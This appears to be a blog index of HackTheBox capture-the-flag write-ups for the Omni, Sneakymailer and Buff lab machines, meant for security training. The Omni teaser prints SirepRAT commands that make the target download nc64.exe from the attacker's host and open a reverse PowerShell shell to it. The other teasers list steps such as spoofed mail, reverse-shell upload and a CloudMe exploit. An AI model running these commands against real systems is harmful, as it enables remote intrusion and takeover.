Hackthebox Omni Writeup 0 (0)

Hackthebox omni Writeup

Introduction Steps Involved Port Scan python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args “/c powershell Invoke-Webrequest -OutFile C:\nc64.exe -Uri http://10.10.14.20:8000/nc64.exe” –v python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –cmd “C:\Windows\System32\cmd.exe” –args “/c C:\nc64.exe 10.10.14.20 9001 -e powershell.exe” –v

Hackthebox Sneakymailer writeup 4.4 (7)

Hackthebox Sneakymailer writeup

Introduction Column Details Name Sneakymailer IP 10.10.10.197 Points 30 Os Linux Difficulty Medium Creator Sulcud Out On 11 July 2020 Steps involved 1-Port Scan 2-Basic website enumeration 3-Sending Spoofed mail 4-Login into imap using paulbyrd creds and extracting mails 5-Login into ftp using developer creds 6-Uploading a Reverse shell through ftp 7-Subdomain enumeration 8-Getting shell … Read moreHackthebox Sneakymailer writeup 4.4 (7)

Hackthebox buff writeup 3.6 (5)

Hackthebox buff writeup

Steps Involved 1-Port Scan 2-Enumerating Website 3-Exploiting Gym Management Software 1.0 4-Getting Web-shell 5-Getting full shell and user.txt 6-Privilege Escalation 7-Exploiting Cloudme.exe 8-Getting root flag Port Scan ┌─[nagendra@parrot]─[~/Desktop/hackthebox/buff] └──╼ $cat nmap Nmap 7.80 scan initiated Fri Aug 7 23:10:59 2020 as: nmap -Pn -sC -sV -v -oN nmap 10.10.10.198 Nmap scan report for 10.10.10.198 Host … Read moreHackthebox buff writeup 3.6 (5)